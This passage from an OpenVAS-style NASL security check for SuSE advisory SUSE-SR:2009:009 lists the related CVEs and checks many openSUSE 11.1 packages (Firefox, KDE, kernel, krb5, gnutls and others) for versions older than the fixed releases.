E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates announced in\nadvisory SUSE-SR:2009:009. SuSE Security Summaries are short\non detail when it comes to the names of packages affected by\na particular bug. Because of this, while this test will detect\nout of date packages, it cannot tell you what bugs impact\nwhich packages, or vice versa.\";\n\ntag_solution = \"Update all out of date packages.\";\n \nif(description)\n{\n script_id(63891);\n script_version(\"$Revision: 6668 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:34:29 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-04-28 20:40:12 +0200 (Tue, 28 Apr 2009)\");\n script_cve_id(\"CVE-2008-4311\", \"CVE-2008-4989\", \"CVE-2009-0193\", \"CVE-2009-0196\", \"CVE-2009-0365\", \"CVE-2009-0578\", \"CVE-2009-0586\", \"CVE-2009-0658\", \"CVE-2009-0698\", \"CVE-2009-0790\", \"CVE-2009-0792\", \"CVE-2009-0922\", \"CVE-2009-0927\", \"CVE-2009-0928\", \"CVE-2009-1061\", \"CVE-2009-1062\", \"CVE-2009-1171\", \"CVE-2009-1241\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SuSE Security Summary SUSE-SR:2009:009\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"MozillaFirefox\", rpm:\"MozillaFirefox~3.0.8~1.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"MozillaFirefox-branding-upstream\", rpm:\"MozillaFirefox-branding-upstream~3.0.8~1.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"MozillaFirefox-translations\", rpm:\"MozillaFirefox-translations~3.0.8~1.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"NetworkManager\", rpm:\"NetworkManager~0.7.0.r4359~15.2.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"NetworkManager-devel\", rpm:\"NetworkManager-devel~0.7.0.r4359~15.2.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"NetworkManager-doc\", rpm:\"NetworkManager-doc~0.7.0.r4359~15.2.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"NetworkManager-glib\", rpm:\"NetworkManager-glib~0.7.0.r4359~15.2.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"aufs\", rpm:\"aufs~cvs20081020~1.32.9\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"aufs-kmp-debug\", rpm:\"aufs-kmp-debug~cvs20081020_2.6.27.21_0.1~1.32.9\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"aufs-kmp-default\", rpm:\"aufs-kmp-default~cvs20081020_2.6.27.21_0.1~1.32.9\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"aufs-kmp-pae\", rpm:\"aufs-kmp-pae~cvs20081020_2.6.27.21_0.1~1.32.9\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"aufs-kmp-trace\", rpm:\"aufs-kmp-trace~cvs20081020_2.6.27.21_0.1~1.32.9\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"aufs-kmp-xen\", rpm:\"aufs-kmp-xen~cvs20081020_2.6.27.21_0.1~1.32.9\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"clamav\", rpm:\"clamav~0.95.1~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"clamav-db\", rpm:\"clamav-db~0.95.1~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"cups\", rpm:\"cups~1.3.9~7.2.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"cups-client\", rpm:\"cups-client~1.3.9~7.2.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"cups-devel\", rpm:\"cups-devel~1.3.9~7.2.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"cups-libs\", rpm:\"cups-libs~1.3.9~7.2.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dbus-1\", rpm:\"dbus-1~1.2.10~5.4.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dbus-1-devel\", rpm:\"dbus-1-devel~1.2.10~5.4.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dbus-1-devel-doc\", rpm:\"dbus-1-devel-doc~1.2.10~5.4.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"deb\", rpm:\"deb~1.14.21~10.38.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"glib2\", rpm:\"glib2~2.18.2~5.2.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"glib2-branding-upstream\", rpm:\"glib2-branding-upstream~2.18.2~5.2.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"glib2-devel\", rpm:\"glib2-devel~2.18.2~5.2.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"glib2-doc\", rpm:\"glib2-doc~2.18.2~5.2.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"glib2-lang\", rpm:\"glib2-lang~2.18.2~5.2.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gnome-panel\", rpm:\"gnome-panel~2.24.1~2.26.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gnome-panel-devel\", rpm:\"gnome-panel-devel~2.24.1~2.26.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gnome-panel-doc\", rpm:\"gnome-panel-doc~2.24.1~2.26.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gnome-panel-extras\", rpm:\"gnome-panel-extras~2.24.1~2.26.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gnome-panel-lang\", rpm:\"gnome-panel-lang~2.24.1~2.26.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gnutls\", rpm:\"gnutls~2.4.1~24.2.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gpg2\", rpm:\"gpg2~2.0.9~25.108.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gpg2-lang\", rpm:\"gpg2-lang~2.0.9~25.108.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gstreamer-0_10-plugins-base\", rpm:\"gstreamer-0_10-plugins-base~0.10.21~2.21.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gstreamer-0_10-plugins-base-devel\", rpm:\"gstreamer-0_10-plugins-base-devel~0.10.21~2.21.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gstreamer-0_10-plugins-base-doc\", rpm:\"gstreamer-0_10-plugins-base-doc~0.10.21~2.21.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gstreamer-0_10-plugins-base-lang\", rpm:\"gstreamer-0_10-plugins-base-lang~0.10.21~2.21.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-openjdk\", rpm:\"java-1_6_0-openjdk~1.4_b14~24.4.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-openjdk-demo\", rpm:\"java-1_6_0-openjdk-demo~1.4_b14~24.4.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-openjdk-devel\", rpm:\"java-1_6_0-openjdk-devel~1.4_b14~24.4.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-openjdk-javadoc\", rpm:\"java-1_6_0-openjdk-javadoc~1.4_b14~24.4.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-openjdk-plugin\", rpm:\"java-1_6_0-openjdk-plugin~1.4_b14~24.4.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-openjdk-src\", rpm:\"java-1_6_0-openjdk-src~1.4_b14~24.4.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kde4-akonadi\", rpm:\"kde4-akonadi~4.1.3~3.14.9\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kde4-akonadi-devel\", rpm:\"kde4-akonadi-devel~4.1.3~3.14.9\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kde4-akregator\", rpm:\"kde4-akregator~4.1.3~3.14.9\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kde4-dolphin\", rpm:\"kde4-dolphin~4.1.3~3.8.9\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kde4-kaddressbook\", rpm:\"kde4-kaddressbook~4.1.3~3.14.9\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kde4-kalarm\", rpm:\"kde4-kalarm~4.1.3~3.14.9\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kde4-kdepasswd\", rpm:\"kde4-kdepasswd~4.1.3~3.8.9\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kde4-kdialog\", rpm:\"kde4-kdialog~4.1.3~3.8.9\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kde4-kdm\", rpm:\"kde4-kdm~4.1.3~10.3.7\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kde4-kdm-branding-upstream\", rpm:\"kde4-kdm-branding-upstream~4.1.3~10.3.7\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kde4-keditbookmarks\", rpm:\"kde4-keditbookmarks~4.1.3~3.8.9\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kde4-kfind\", rpm:\"kde4-kfind~4.1.3~3.8.9\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kde4-kgreeter-plugins\", rpm:\"kde4-kgreeter-plugins~4.1.3~10.3.7\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kde4-kinfocenter\", rpm:\"kde4-kinfocenter~4.1.3~3.8.9\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kde4-kjots\", rpm:\"kde4-kjots~4.1.3~3.14.9\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kde4-kmail\", rpm:\"kde4-kmail~4.1.3~3.14.9\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kde4-knode\", rpm:\"kde4-knode~4.1.3~3.14.9\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kde4-knotes\", rpm:\"kde4-knotes~4.1.3~3.14.9\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kde4-konqueror\", rpm:\"kde4-konqueror~4.1.3~3.8.9\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kde4-konsole\", rpm:\"kde4-konsole~4.1.3~3.8.9\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kde4-kontact\", rpm:\"kde4-kontact~4.1.3~3.14.9\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kde4-korganizer\", rpm:\"kde4-korganizer~4.1.3~3.14.9\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kde4-ktimetracker\", rpm:\"kde4-ktimetracker~4.1.3~3.14.9\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kde4-ktnef\", rpm:\"kde4-ktnef~4.1.3~3.14.9\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kde4-kwin\", rpm:\"kde4-kwin~4.1.3~10.3.7\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kde4-kwrite\", rpm:\"kde4-kwrite~4.1.3~3.8.9\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kdebase4\", rpm:\"kdebase4~4.1.3~3.8.9\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kdebase4-libkonq\", rpm:\"kdebase4-libkonq~4.1.3~3.8.9\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kdebase4-nsplugin\", rpm:\"kdebase4-nsplugin~4.1.3~3.8.9\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kdebase4-runtime\", rpm:\"kdebase4-runtime~4.1.3~4.2.9\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kdebase4-workspace\", rpm:\"kdebase4-workspace~4.1.3~10.3.7\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kdebase4-workspace-branding-upstream\", rpm:\"kdebase4-workspace-branding-upstream~4.1.3~10.3.7\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kdebase4-workspace-devel\", rpm:\"kdebase4-workspace-devel~4.1.3~10.3.7\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kdebase4-workspace-ksysguardd\", rpm:\"kdebase4-workspace-ksysguardd~4.1.3~10.3.7\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kdelibs4\", rpm:\"kdelibs4~4.1.3~4.10.4\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kdelibs4-core\", rpm:\"kdelibs4-core~4.1.3~4.10.4\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kdelibs4-doc\", rpm:\"kdelibs4-doc~4.1.3~4.10.4\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kdepim3\", rpm:\"kdepim3~3.5.10~8.14.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kdepim3-devel\", rpm:\"kdepim3-devel~3.5.10~8.14.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kdepim3-kpilot\", rpm:\"kdepim3-kpilot~3.5.10~8.14.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kdepim3-mobile\", rpm:\"kdepim3-mobile~3.5.10~8.14.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kdepim3-notes\", rpm:\"kdepim3-notes~3.5.10~8.14.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kdepim3-time-management\", rpm:\"kdepim3-time-management~3.5.10~8.14.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kdepim4\", rpm:\"kdepim4~4.1.3~3.14.9\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kdepim4-devel\", rpm:\"kdepim4-devel~4.1.3~3.14.9\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kdepim4-wizards\", rpm:\"kdepim4-wizards~4.1.3~3.14.9\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kdepimlibs4\", rpm:\"kdepimlibs4~4.1.3~5.2.6\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.27.21~0.1.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-base\", rpm:\"kernel-debug-base~2.6.27.21~0.1.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-extra\", rpm:\"kernel-debug-extra~2.6.27.21~0.1.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-default\", rpm:\"kernel-default~2.6.27.21~0.1.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-default-base\", rpm:\"kernel-default-base~2.6.27.21~0.1.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-default-extra\", rpm:\"kernel-default-extra~2.6.27.21~0.1.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-pae\", rpm:\"kernel-pae~2.6.27.21~0.1.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-pae-base\", rpm:\"kernel-pae-base~2.6.27.21~0.1.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-pae-extra\", rpm:\"kernel-pae-extra~2.6.27.21~0.1.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-source\", rpm:\"kernel-source~2.6.27.21~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-syms\", rpm:\"kernel-syms~2.6.27.21~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-trace\", rpm:\"kernel-trace~2.6.27.21~0.1.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-trace-base\", rpm:\"kernel-trace-base~2.6.27.21~0.1.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-trace-extra\", rpm:\"kernel-trace-extra~2.6.27.21~0.1.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-vanilla\", rpm:\"kernel-vanilla~2.6.27.21~0.1.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~2.6.27.21~0.1.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-xen-base\", rpm:\"kernel-xen-base~2.6.27.21~0.1.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-xen-extra\", rpm:\"kernel-xen-extra~2.6.27.21~0.1.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kio_iso\", rpm:\"kio_iso~1.99.2.beta2~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kitchensync\", rpm:\"kitchensync~3.5.10~8.14.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"klamav\", rpm:\"klamav~0.46~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"koffice\", rpm:\"koffice~1.6.3~211.12.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"koffice-database\", rpm:\"koffice-database~1.6.3~211.12.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"koffice-database-mysql\", rpm:\"koffice-database-mysql~1.6.3~211.12.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"koffice-database-psql\", rpm:\"koffice-database-psql~1.6.3~211.12.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"koffice-devel\", rpm:\"koffice-devel~1.6.3~211.12.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"koffice-extra\", rpm:\"koffice-extra~1.6.3~211.12.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"koffice-illustration\", rpm:\"koffice-illustration~1.6.3~211.12.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"koffice-planning\", rpm:\"koffice-planning~1.6.3~211.12.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"koffice-presentation\", rpm:\"koffice-presentation~1.6.3~211.12.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"koffice-python\", rpm:\"koffice-python~1.6.3~211.12.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"koffice-ruby\", rpm:\"koffice-ruby~1.6.3~211.12.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"koffice-spreadsheet\", rpm:\"koffice-spreadsheet~1.6.3~211.12.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"koffice-wordprocessing\", rpm:\"koffice-wordprocessing~1.6.3~211.12.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"krb5\", rpm:\"krb5~1.6.3~132.5.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"krb5-apps-clients\", rpm:\"krb5-apps-clients~1.6.3~132.5.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"krb5-apps-servers\", rpm:\"krb5-apps-servers~1.6.3~132.5.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"krb5-client\", rpm:\"krb5-client~1.6.3~132.5.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"krb5-devel\", rpm:\"krb5-devel~1.6.3~132.5.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"krb5-server\", rpm:\"krb5-server~1.6.3~132.5.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"krusader\", rpm:\"krusader~1.99.2.beta2~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libakonadi4\", rpm:\"libakonadi4~4.1.3~5.2.6\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libgio-2_0-0\", rpm:\"libgio-2_0-0~2.18.2~5.2.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libgio-fam\", rpm:\"libgio-fam~2.18.2~5.2.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libglib-2_0-0\", rpm:\"libglib-2_0-0~2.18.2~5.2.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libgmodule-2_0-0\", rpm:\"libgmodule-2_0-0~2.18.2~5.2.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libgnomecanvas\", rpm:\"libgnomecanvas~2.20.1.1~25.81.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libgnomecanvas-devel\", rpm:\"libgnomecanvas-devel~2.20.1.1~25.81.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libgnomecanvas-doc\", rpm:\"libgnomecanvas-doc~2.20.1.1~25.81.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libgnomecanvas-lang\", rpm:\"libgnomecanvas-lang~2.20.1.1~25.81.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libgnutls-devel\", rpm:\"libgnutls-devel~2.4.1~24.2.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libgnutls-extra-devel\", rpm:\"libgnutls-extra-devel~2.4.1~24.2.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libgnutls-extra26\", rpm:\"libgnutls-extra26~2.4.1~24.2.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libgnutls26\", rpm:\"libgnutls26~2.4.1~24.2.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libgobject-2_0-0\", rpm:\"libgobject-2_0-0~2.18.2~5.2.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libgstinterfaces-0_10-0\", rpm:\"libgstinterfaces-0_10-0~0.10.21~2.21.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = 